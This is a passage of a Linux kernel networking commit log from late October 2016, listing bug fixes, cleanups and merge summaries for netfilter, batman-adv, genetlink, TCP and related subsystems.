Commit Graph

44719 Commits

Author SHA1 Message Date
Liping Zhang
b73b8a1ba5 netfilter: nft_dup: do not use sreg_dev if the user doesn't specify it
The NFTA_DUP_SREG_DEV attribute is not a must option, so we should use it
in routing lookup only when the user specify it.

Fixes: d877f07112 ("netfilter: nf_tables: add nft_dup expression")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-31 13:17:38 +01:00
Liping Zhang
c17c3cdff1 netfilter: nf_tables: destroy the set if fail to add transaction
When the memory is exhausted, then we will fail to add the NFT_MSG_NEWSET
transaction. In such case, we should destroy the set before we free it.

Fixes: 958bee14d0 ("netfilter: nf_tables: use new transaction infrastructure to handle sets")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-31 13:17:29 +01:00
David S. Miller
27058af401 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Mostly simple overlapping changes.

For example, David Ahern's adjacency list revamp in 'net-next'
conflicted with an adjacency list traversal bug fix in 'net'.

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-30 12:42:58 -04:00
Sven Eckelmann
1ad5bcb2a0 batman-adv: Consume skb in batadv_send_skb_to_orig
Sending functions in Linux consume the supplied skbuff. Doing the same in
batadv_send_skb_to_orig avoids the hack of returning -1 (-EPERM) to signal
the caller that he is responsible for cleaning up the skb.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:37 +01:00
Sven Eckelmann
8def0be82d batman-adv: Consume skb in batadv_frag_send_packet
Sending functions in Linux consume the supplied skbuff. Doing the same in
batadv_frag_send_packet avoids the hack of returning -1 (-EPERM) to signal
the caller that he is responsible for cleaning up the skb.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:37 +01:00
Sven Eckelmann
eaac2c876e batman-adv: Count all non-success TX packets as dropped
A failure during the submission also causes dropped packets.
batadv_interface_tx should therefore also increase the DROPPED counter for
these returns.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:36 +01:00
Sven Eckelmann
bd687fe419 batman-adv: use consume_skb for non-dropped packets
kfree_skb assumes that an skb is dropped after an failure and notes that.
consume_skb should be used in non-failure situations. Such information is
important for dropmonitor netlink which tells how many packets were dropped
and where this drop happened.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:36 +01:00
Linus Lüssing
3111beed0d batman-adv: Simple (re)broadcast avoidance
With this patch, (re)broadcasting on a specific interfaces is avoided:

* No neighbor: There is no need to broadcast on an interface if there
  is no node behind it.

* Single neighbor is source: If there is just one neighbor on an
  interface and if this neighbor is the one we actually got this
  broadcast packet from, then we do not need to echo it back.

* Single neighbor is originator: If there is just one neighbor on
  an interface and if this neighbor is the originator of this
  broadcast packet, then we do not need to echo it back.

Goodies for BATMAN V:

("Upgrade your BATMAN IV network to V now to get these for free!")

Thanks to the split of OGMv1 into two packet types, OGMv2 and ELP
that is, we can now apply the same optimizations stated above to OGMv2
packets, too.

Furthermore, with BATMAN V, rebroadcasts can be reduced in certain
multi interface cases, too, where BATMAN IV cannot. This is thanks to
the removal of the "secondary interface originator" concept in BATMAN V.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:35 +01:00
Linus Lüssing
cbebd363b2 batman-adv: Use own timer for multicast TT and TVLV updates
Instead of latching onto the OGM period, this patch introduces a worker
dedicated to multicast TT and TVLV updates.

The reasoning is, that upon roaming especially the translation table
should be updated timely to minimize connectivity issues.

With BATMAN V, the idea is to greatly increase the OGM interval to
reduce overhead. Unfortunately, right now this could lead to
a bad user experience if multicast traffic is involved.

Therefore this patch introduces a fixed 500ms update interval for
multicast TT entries and the multicast TVLV.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:35 +01:00
Linus Lüssing
eb6915e2eb batman-adv: Remove unused skb_reset_mac_header()
During broadcast queueing, the skb_reset_mac_header() sets the skb
to a place invalid for a MAC header, pointing right into the
batman-adv broadcast packet. Luckily, no one seems to actually use
eth_hdr(skb) afterwards until batadv_send_skb_packet() resets the
header to a valid position again.

Therefore removing this unnecessary, weird skb_reset_mac_header()
call.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:34 +01:00
Linus Lüssing
b77697633d batman-adv: Remove unnecessary lockdep in batadv_mcast_mla_list_free
batadv_mcast_mla_list_free() just frees some leftovers of a local feast
in batadv_mcast_mla_update(). No lockdep needed as it has nothing to do
with bat_priv->mcast.mla_list.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:34 +01:00
Linus Lüssing
cbfc16de30 batman-adv: Add wrapper for ARP reply creation
Removing duplicate code.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:33 +01:00
Sven Eckelmann
75721643d5 batman-adv: Close two alignment holes in batadv_hard_iface
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:33 +01:00
Sven Eckelmann
ce1a21d142 batman-adv: Mark batadv_netlink_ops as const
The genl_ops don't need to be written by anyone and thus can be moved in a
ro memory range.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:32 +01:00
Sven Eckelmann
9bcb94c861 batman-adv: Introduce missing headers for genetlink restructure
Fixes: 56989f6d85 ("genetlink: mark families as __ro_after_init")
Fixes: 2ae0f17df1 ("genetlink: use idr to track families")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:32 +01:00
Linus Torvalds
2a26d99b25 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:
 "Lots of fixes, mostly drivers as is usually the case.

   1) Don't treat zero DMA address as invalid in vmxnet3, from Alexey
      Khoroshilov.

   2) Fix element timeouts in netfilter's nft_dynset, from Anders K.
      Pedersen.

   3) Don't put aead_req crypto struct on the stack in mac80211, from
      Ard Biesheuvel.

   4) Several uninitialized variable warning fixes from Arnd Bergmann.

   5) Fix memory leak in cxgb4, from Colin Ian King.

   6) Fix bpf handling of VLAN header push/pop, from Daniel Borkmann.

   7) Several VRF semantic fixes from David Ahern.

   8) Set skb->protocol properly in ip6_tnl_xmit(), from Eli Cooper.

   9) Socket needs to be locked in udp_disconnect(), from Eric Dumazet.

  10) Div-by-zero on 32-bit fix in mlx4 driver, from Eugenia Emantayev.

  11) Fix stale link state during failover in NCSCI driver, from Gavin
      Shan.

  12) Fix netdev lower adjacency list traversal, from Ido Schimmel.

  13) Propvide proper handle when emitting notifications of filter
      deletes, from Jamal Hadi Salim.

  14) Memory leaks and big-endian issues in rtl8xxxu, from Jes Sorensen.

  15) Fix DESYNC_FACTOR handling in ipv6, from Jiri Bohac.

  16) Several routing offload fixes in mlxsw driver, from Jiri Pirko.

  17) Fix broadcast sync problem in TIPC, from Jon Paul Maloy.

  18) Validate chunk len before using it in SCTP, from Marcelo Ricardo
      Leitner.

  19) Revert a netns locking change that causes regressions, from Paul
      Moore.

  20) Add recursion limit to GRO handling, from Sabrina Dubroca.

  21) GFP_KERNEL in irq context fix in ibmvnic, from Thomas Falcon.

  22) Avoid accessing stale vxlan/geneve socket in data path, from
      Pravin Shelar"

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (189 commits)
  geneve: avoid using stale geneve socket.
  vxlan: avoid using stale vxlan socket.
  qede: Fix out-of-bound fastpath memory access
  net: phy: dp83848: add dp83822 PHY support
  enic: fix rq disable
  tipc: fix broadcast link synchronization problem
  ibmvnic: Fix missing brackets in init_sub_crq_irqs
  ibmvnic: Fix releasing of sub-CRQ IRQs in interrupt context
  Revert "ibmvnic: Fix releasing of sub-CRQ IRQs in interrupt context"
  arch/powerpc: Update parameters for csum_tcpudp_magic & csum_tcpudp_nofold
  net/mlx4_en: Save slave ethtool stats command
  net/mlx4_en: Fix potential deadlock in port statistics flow
  net/mlx4: Fix firmware command timeout during interrupt test
  net/mlx4_core: Do not access comm channel if it has not yet been initialized
  net/mlx4_en: Fix panic during reboot
  net/mlx4_en: Process all completions in RX rings after port goes up
  net/mlx4_en: Resolve dividing by zero in 32-bit system
  net/mlx4_core: Change the default value of enable_qos
  net/mlx4_core: Avoid setting ports to auto when only one port type is supported
  net/mlx4_core: Fix the resource-type enum in res tracker to conform to FW spec
  ...
2016-10-29 20:33:20 -07:00
pravin shelar
0e82c76359 genetlink: Fix generic netlink family unregister
This patch fixes a typo in unregister operation.

Following crash is fixed by this patch. It can be easily reproduced
by repeating modprobe and rmmod module that uses genetlink.

[  261.446686] BUG: unable to handle kernel paging request at ffffffffa0264088
[  261.448921] IP: [<ffffffff813cb70e>] strcmp+0xe/0x30
[  261.450494] PGD 1c09067
[  261.451266] PUD 1c0a063
[  261.452091] PMD 8068d5067
[  261.452525] PTE 0
[  261.453164]
[  261.453618] Oops: 0000 [#1] SMP
[  261.454577] Modules linked in: openvswitch(+) ...
[  261.480753] RIP: 0010:[<ffffffff813cb70e>]  [<ffffffff813cb70e>] strcmp+0xe/0x30
[  261.483069] RSP: 0018:ffffc90003c0bc28  EFLAGS: 00010282
[  261.510145] Call Trace:
[  261.510896]  [<ffffffff816f10ca>] genl_family_find_byname+0x5a/0x70
[  261.512819]  [<ffffffff816f2319>] genl_register_family+0xb9/0x630
[  261.514805]  [<ffffffffa02840bc>] dp_init+0xbc/0x120 [openvswitch]
[  261.518268]  [<ffffffff8100217d>] do_one_initcall+0x3d/0x160
[  261.525041]  [<ffffffff811808a9>] do_init_module+0x60/0x1f1
[  261.526754]  [<ffffffff8110687f>] load_module+0x22af/0x2860
[  261.530144]  [<ffffffff81107026>] SYSC_finit_module+0x96/0xd0
[  261.531901]  [<ffffffff8110707e>] SyS_finit_module+0xe/0x10
[  261.533605]  [<ffffffff8100391e>] do_syscall_64+0x6e/0x180
[  261.535284]  [<ffffffff817c2faf>] entry_SYSCALL64_slow_path+0x25/0x25
[  261.546512] RIP  [<ffffffff813cb70e>] strcmp+0xe/0x30
[  261.550198] ---[ end trace 76505a814dd68770 ]---

Fixes: 2ae0f17df1 ("genetlink: use idr to track families").

Reported-by: Jarno Rajahalme <jarno@ovn.org>
CC: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Pravin B Shelar <pshelar@ovn.org>
Reviewed-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 20:58:15 -04:00
David S. Miller
32ab0a38f0 Among various cleanups and improvements, we have the following:
* client FILS authentication support in mac80211 (Jouni)
  * AP/VLAN multicast improvements (Michael Braun)
  * config/advertising support for differing beacon intervals on
    multiple virtual interfaces (Purushottam Kushwaha, myself)
  * deprecate the old WDS mode for cfg80211-based drivers, the
    mode is hardly usable since it doesn't support any "modern"
    features like WPA encryption (2003), HT (2009) or VHT (2014),
    I'm not even sure WEP (introduced in 1997) could be done.
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJYEy/9AAoJEGt7eEactAAd/V0P/0FmHGS8HjlSjm+1p6sbWKbt
 5v8bb3cuKHQiYiUM6euIXql2OYuOEHVAQEpNoPXN9CsfKFYgbIH6yW6d8HtKNedV
 n9lmMy/U6yJX9nYt7yMIQ3kLkbEg+YU58B9Hf47waWXLLSNVumS8rfNBn43EoNQf
 VKWYPWpetsCRIWJ1fnLuxvMHCtOOYCxH+491BUonof32+DKPEAsAbnszZ2ElufTR
 7KNyA3K6leOtTd5Ml52dvLOGNc+h2C83VAMxiShq/6r8OnlX5tPifaubzd9n3m41
 jiJJH/92ESrtF2AaWEm8slcgtcfHS/O7y/FSoV4r0PMSvPTBdjwQ9nqCsbONd831
 vjj6c6YWNxgHPcISX0XcWz+FHnLJdUGaDUtHjAJYw4oH4gaRXwfSw0U+jvdlSMUf
 2CBUArk5f0OEguzwa/5X4Jio3OPPIj4jY/lKplcpLOUu8K2FWTLDuIlww/FHXovs
 rDzTLQeXZkx+MkszkTJN42qSEfOFly91J6OA2Wju+emBqrLIbkAGmvyLVg8U8BQd
 gG7oltgmZ6Xg6fEnUQqpIDO7UJlQ+GXAU04SpNDMv1j/ueUJskxlr3hYM7E9ueQv
 LJcZcVV0RAwNRw52cEsdcYCMLuSMYRrO1OHlkl0wd+x2hFrUCWnVzUgLEUhNBV+c
 ICmNMr96nKhrZI217yzF
 =SjfQ
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-next-for-davem-2016-10-28' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211-next

Johannes Berg says:

====================
Among various cleanups and improvements, we have the following:
 * client FILS authentication support in mac80211 (Jouni)
 * AP/VLAN multicast improvements (Michael Braun)
 * config/advertising support for differing beacon intervals on
   multiple virtual interfaces (Purushottam Kushwaha, myself)
 * deprecate the old WDS mode for cfg80211-based drivers, the
   mode is hardly usable since it doesn't support any "modern"
   features like WPA encryption (2003), HT (2009) or VHT (2014),
   I'm not even sure WEP (introduced in 1997) could be done.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 17:28:45 -04:00
Jon Paul Maloy
06bd2b1ed0 tipc: fix broadcast link synchronization problem
In commit 2d18ac4ba7 ("tipc: extend broadcast link initialization
criteria") we tried to fix a problem with the initial synchronization
of broadcast link acknowledge values. Unfortunately that solution is
not sufficient to solve the issue.

We have seen it happen that LINK_PROTOCOL/STATE packets with a valid
non-zero unicast acknowledge number may bypass BCAST_PROTOCOL
initialization, NAME_DISTRIBUTOR and other STATE packets with invalid
broadcast acknowledge numbers, leading to premature opening of the
broadcast link. When the bypassed packets finally arrive, they are
inadvertently accepted, and the already correctly initialized
acknowledge number in the broadcast receive link is overwritten by
the invalid (zero) value of the said packets. After this the broadcast
link goes stale.

We now fix this by marking the packets where we know the acknowledge
value is or may be invalid, and then ignoring the acks from those.

To this purpose, we claim an unused bit in the header to indicate that
the value is invalid. We set the bit to 1 in the initial BCAST_PROTOCOL
synchronization packet and all initial ("bulk") NAME_DISTRIBUTOR
packets, plus those LINK_PROTOCOL packets sent out before the broadcast
links are fully synchronized.

This minor protocol update is fully backwards compatible.

Reported-by: John Thompson <thompa.atl@gmail.com>
Tested-by: John Thompson <thompa.atl@gmail.com>
Signed-off-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 17:21:09 -04:00
Neal Cardwell
9b9375b5b7 tcp_bbr: add a state transition diagram and accompanying comment
Document the possible state transitions for a BBR flow, and also add a
prose summary of the state machine, covering the life of a typical BBR
flow.

Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 17:12:43 -04:00
David S. Miller
a283ad5066 This code cleanup patchset includes the following changes (chronological
order):
 
  - bump version strings, by Simon Wunderlich
 
  - README updates/clean up, by Sven Eckelmann (4 patches)
 
  - Code clean up and restructuring by Sven Eckelmann (2 patches)
 
  - Kerneldoc fix in forw_packet structure, by Linus Luessing
 
  - Remove unused argument in dbg_arp, by Antonio Quartulli
 
  - Add support to build batman-adv without wireless, by Linus Luessing
 
  - Restructure error handling for is_ap_isolated, by Markus Elfring
 
  - Remove unused initialization in various functions, by Sven Eckelmann
 
  - Use better names for fragment and gateway list heads, by Sven
    Eckelmann (2 patches)
 
  - Convert to octal permissions for files, by Sven Eckelmann
 
  - Avoid precedence issues for some macros, by Sven Eckelmann
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdBQJYEk4JFhxzd0BzaW1vbnd1bmRlcmxpY2guZGUACgkQoSvjmEKS
 nqFEXQ/+M5JTsV+6oN6yknj30D8HpBKp785UiLbKeu7AadpA3KUn/kDbivihF0Cq
 YrfORAbXyGY/CNrSbx0rZbC79jyBSuvSt9whI92rPsmAvbkeypRdOSpKz5HbkNTh
 MxPblI29AvBwIMH5I+vW9iZvqxpdtJh0h/zCT0db5NQVCW7sVpfIMhCJvOULMFJj
 WuPS/YXA4rBW2RJtGHrAy//byhF7ng26qCV06Bxy5xwKK/ncZX5GmgZVrZ5YWgO6
 3kcEjLL1iASnYAoUu6X5PWeT3SZLutlZ2sWu8O3X7ShtpRT48Uisj1OFlIOgOGc5
 fF2iFxWAUlEt8gu4aAADVnknANPMdChfvJG9w9XOlXte4bJtKpr8dJz/jhHiPMYb
 NScHhpAcdpkFSej8RUHibIC+TjVc50vOqPCFtM0smKQ7cgyWNU+V1Bo5pXMkYGA8
 7OhbWJ87mOkPWj2Yr/YeWHhvnrwbnyZFMSaPHJuCOei+zsgCpAtjPK8InfzDQoWu
 UlRBgaO7zxEDUlmaAHHBUOCNB0uM1H8LR1opi7GjPdNUbONyN2mris3nz9UB1aL3
 +b9bWiNzNh6DsEF+UEJfHW/Nrx+yI7mMQw5/zOknhdHUhFTM3kPbWNYdJfo0yPgn
 KSq2tr4mmGLySFsPEVQI5QBDT2iF0Ee7P6PMlA/J64dwSJj+Mc8=
 =eDGz
 -----END PGP SIGNATURE-----

Merge tag 'batadv-next-for-davem-20161027' of git://git.open-mesh.org/linux-merge

Simon Wunderlich says:

====================
This code cleanup patchset includes the following changes (chronological
order):

 - bump version strings, by Simon Wunderlich

 - README updates/clean up, by Sven Eckelmann (4 patches)

 - Code clean up and restructuring by Sven Eckelmann (2 patches)

 - Kerneldoc fix in forw_packet structure, by Linus Luessing

 - Remove unused argument in dbg_arp, by Antonio Quartulli

 - Add support to build batman-adv without wireless, by Linus Luessing

 - Restructure error handling for is_ap_isolated, by Markus Elfring

 - Remove unused initialization in various functions, by Sven Eckelmann

 - Use better names for fragment and gateway list heads, by Sven
   Eckelmann (2 patches)

 - Convert to octal permissions for files, by Sven Eckelmann

 - Avoid precedence issues for some macros, by Sven Eckelmann
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 16:26:50 -04:00
shamir rabinovitch
ff57087f31 rds: debug messages are enabled by default
rds use Kconfig option called "RDS_DEBUG" to enable rds debug messages.
This option cause the rds Makefile to add -DDEBUG to the rds gcc command
line.

When CONFIG_DYNAMIC_DEBUG is enabled, the "DEBUG" macro is used by
include/linux/dynamic_debug.h to decide if dynamic debug prints should
be sent by default to the kernel log.

rds should not enable this macro for production builds. rds dynamic
debug work as expected follow this fix.

Signed-off-by: Shamir Rabinovitch <shamir.rabinovitch@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Reviewed-by: Wengang Wang <wen.gang.wang@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:55:57 -04:00
David S. Miller
880b583ce1 Just two fixes:
* a fix to process all events while suspending, so any
    potential calls into the driver are done before it is
    suspended
  * small markup fixes for the sphinx documentation conversion
    that's coming into the tree via the doc tree
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJYEbSGAAoJEGt7eEactAAdOo4P/A1RyOl2uTspwB4lZFMMA5Tp
 IIwaB+WlNcjGq05C8kemdQJ30AKJUy6aKMTb5FIuFXWLRK6u5uIoQsYe6cRI8WBs
 bgTpo5RMcNGx6dUgFS/XwM2bLXUNXAXOt+43c2kWSjnqQZpQuSXh8/4R8ybZxyZB
 SNyKCzkx1LYPox4Qnufmi+pz/hI8hHRY7gMdyhUWU2uUk9u/nuY0Zxyvj4OFgyow
 SOGasCPoDzT9556hUGyG9M8HmwBiRZUzfzo5mSR2V0a9Tij4ZOvoSkcAUDbj38fZ
 0UPJ48xwUDMF88W+NEO+rrd1IQXtlsHJk6x/mAQpSkEvzymb5BEvraVeTV3+chgo
 fn45ZDP/GbTwqJ3YacSmKgyGwaGPF9XN2+Iuxotp0UeuYxvxwnkWNr0JbRecDPau
 ZL/P2qV7Y3gjy0+6nHafrYIYPuPFZjwPIJ7k6x7mVtO6zfJhtKF57YP/YoFYD78l
 TtCEE5o7lAYkdWKa2nm4Fg16NM897PS/GTM9dQCFtnYLV7ynZPY2TGf4TelqJ3cz
 FU1/vlM0t/jRkkRKIhlmy8re4ASjTEccf//dllz1CDyPdxHY1NmGftftz539s7qW
 NpCvvO0IXDchBT1jeoSMwcMzlZSfQeIKtkp1P0z4lyPiMcmekdgUQ7sb84FhwSa+
 SYRpiZ/Xv6xa5Djhonci
 =toQY
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-for-davem-2016-10-27' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211

Johannes Berg says:

====================
Just two fixes:
 * a fix to process all events while suspending, so any
   potential calls into the driver are done before it is
   suspended
 * small markup fixes for the sphinx documentation conversion
   that's coming into the tree via the doc tree
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:54:16 -04:00
David Ahern
46b5ab1a7c net: dev: Fix non-RCU based lower dev walker
netdev_walk_all_lower_dev is not properly walking the lower device
list.  Commit 1a3f060c1a made netdev_walk_all_lower_dev similar
to netdev_walk_all_upper_dev_rcu and netdev_walk_all_lower_dev_rcu
but failed to update its netdev_next_lower_dev iterator. This patch
fixes that.

Fixes: 1a3f060c1a ("net: Introduce new api for walking upper and
                     lower devices")
Reported-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Tested-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:50:30 -04:00
Florian Westphal
b917783c7b flow_dissector: __skb_get_hash_symmetric arg can be const
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:10:21 -04:00
Eric Dumazet
5ea8ea2cb7 tcp/dccp: drop SYN packets if accept queue is full
Per listen(fd, backlog) rules, there is really no point accepting a SYN,
sending a SYNACK, and dropping the following ACK packet if accept queue
is full, because application is not draining accept queue fast enough.

This behavior is fooling TCP clients that believe they established a
flow, while there is nothing at server side. They might then send about
10 MSS (if using IW10) that will be dropped anyway while server is under
stress.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:09:21 -04:00
David S. Miller
ad60133909 Here are three batman-adv bugfix patches:
- Fix RCU usage for neighbor list, by Sven Eckelmann
 
  - Fix BATADV_DBG_ALL loglevel to include TP Meter messages, by Sven Eckelmann
 
  - Fix possible splat when disabling an interface, by Linus Luessing
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdBQJYENCVFhxzd0BzaW1vbnd1bmRlcmxpY2guZGUACgkQoSvjmEKS
 nqFEdA/9HItVGDUIWhLhLRPJFsPSWaENQ1SFaYACHn7zYTMMmbu4uVjMDqlITcu2
 aDyPcgbAkjGPDCDsX6ON6FsJHoovXiKUQCbri45jTgye4Gc0zmh7+Aj/MusCy20s
 U+hYvJ5jTEKFgqh96fc5ot8qxLBveBKrzLa6L+RO2pZmB15ZF/AexCOxUdM56PuL
 nITvewDXJLCbdY4V555K3m2B8cPo2O/Q4eTBg9bwKHG+lGpHqF9qDmlX7S1selcI
 F9toA6XO1e5fRNMbcHR0BxC0ZhJufCWi0ZGylW8M0HwmUVO1+QttVORkN4ECBQOu
 /J6rGfSZbZIRlQ9uGiqqBRkyGBVcoNoNn9mz9c0l9tNQ2AtfW98EXZbtHm8m/BQL
 UgDndVoFW/RHxBsF9IwavSCWBpAg5RAVvV+XwlH07A0WuOehxOV+UkbXzFD1z7Yb
 c+4wuLgfdNTiV8ttfC25lb5PpYo8g8wZf65sGfw3Ej+6iCSQplakoPzuE5kqiMBR
 Q45vELled0elY8GiaNKhrwB42daN7lctn36vL+SfP0R49FtymnaeCDBnH8L7lYVn
 VUP1Fls8BOA2zi1GKKWOMortgxZLynMWleNJC+5Noa04JX8nyMgNJyof85UkaTz+
 QZ/WK4D8gwWfrkWvTH2UQM0iDOcgURWhKu6T8yhlbmymocnSVZI=
 =/5y8
 -----END PGP SIGNATURE-----

Merge tag 'batadv-net-for-davem-20161026' of git://git.open-mesh.org/linux-merge

Simon Wunderlich says:

====================
Here are three batman-adv bugfix patches:

 - Fix RCU usage for neighbor list, by Sven Eckelmann

 - Fix BATADV_DBG_ALL loglevel to include TP Meter messages, by Sven Eckelmann

 - Fix possible splat when disabling an interface, by Linus Luessing
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:05:53 -04:00
Willem de Bruijn
104ba78c98 packet: on direct_xmit, limit tso and csum to supported devices
When transmitting on a packet socket with PACKET_VNET_HDR and
PACKET_QDISC_BYPASS, validate device support for features requested
in vnet_hdr.

Drop TSO packets sent to devices that do not support TSO or have the
feature disabled. Note that the latter currently do process those
packets correctly, regardless of not advertising the feature.

Because of SKB_GSO_DODGY, it is not sufficient to test device features
with netif_needs_gso. Full validate_xmit_skb is needed.

Switch to software checksum for non-TSO packets that request checksum
offload if that device feature is unsupported or disabled. Note that
similar to the TSO case, device drivers may perform checksum offload
correctly even when not advertising it.

When switching to software checksum, packets hit skb_checksum_help,
which has two BUG_ON checksum not in linear segment. Packet sockets
always allocate at least up to csum_start + csum_off + 2 as linear.

Tested by running github.com/wdebruij/kerneltools/psock_txring_vnet.c

  ethtool -K eth0 tso off tx on
  psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v
  psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v -N

  ethtool -K eth0 tx off
  psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G
  psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G -N

v2:
  - add EXPORT_SYMBOL_GPL(validate_xmit_skb_list)

Fixes: d346a3fae3 ("packet: introduce PACKET_QDISC_BYPASS socket option")
Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:02:15 -04:00
Johannes Berg
4700e9ce6e net_sched actions: use nla_parse_nested()
Use nla_parse_nested instead of open-coding the call to
nla_parse() with the attribute data/len.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:01:01 -04:00
Ido Schimmel
c778453b13 switchdev: Remove redundant variable
Instead of storing return value in 'err' and returning, just return
directly.

Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reviewed-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:58:33 -04:00
Thomas Graf
b15ca182ed netlink: Add nla_memdup() to wrap kmemdup() use on nlattr
Wrap several common instances of:
	kmemdup(nla_data(attr), nla_len(attr), GFP_KERNEL);

Signed-off-by: Thomas Graf <tgraf@suug.ch>
Acked-by: Johannes Berg <johannes@sipsolutions.net>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:57:42 -04:00
Arnd Bergmann
f8da977989 net: ip, diag: include net/inet_sock.h
The newly added raw_diag.c fails to build in some configurations
unless we include this header:

In file included from net/ipv4/raw_diag.c:6:0:
include/net/raw.h:71:21: error: field 'inet' has incomplete type
net/ipv4/raw_diag.c: In function 'raw_diag_dump':
net/ipv4/raw_diag.c:166:29: error: implicit declaration of function 'inet_sk'

Fixes: 432490f9d4 ("net: ip, diag -- Add diag interface for raw sockets")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:52:18 -04:00
Eli Cooper
ae148b0858 ip6_tunnel: Update skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit()
This patch updates skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit() when an
IPv6 header is installed to a socket buffer.

This is not a cosmetic change.  Without updating this value, GSO packets
transmitted through an ipip6 tunnel have the protocol of ETH_P_IP and
skb_mac_gso_segment() will attempt to call gso_segment() for IPv4,
which results in the packets being dropped.

Fixes: b8921ca83e ("ip4ip6: Support for GSO/GRO")
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:49:31 -04:00
Craig Gallek
e4cabca549 inet: Fix missing return value in inet6_hash
As part of a series to implement faster SO_REUSEPORT lookups,
commit 086c653f58 ("sock: struct proto hash function may error")
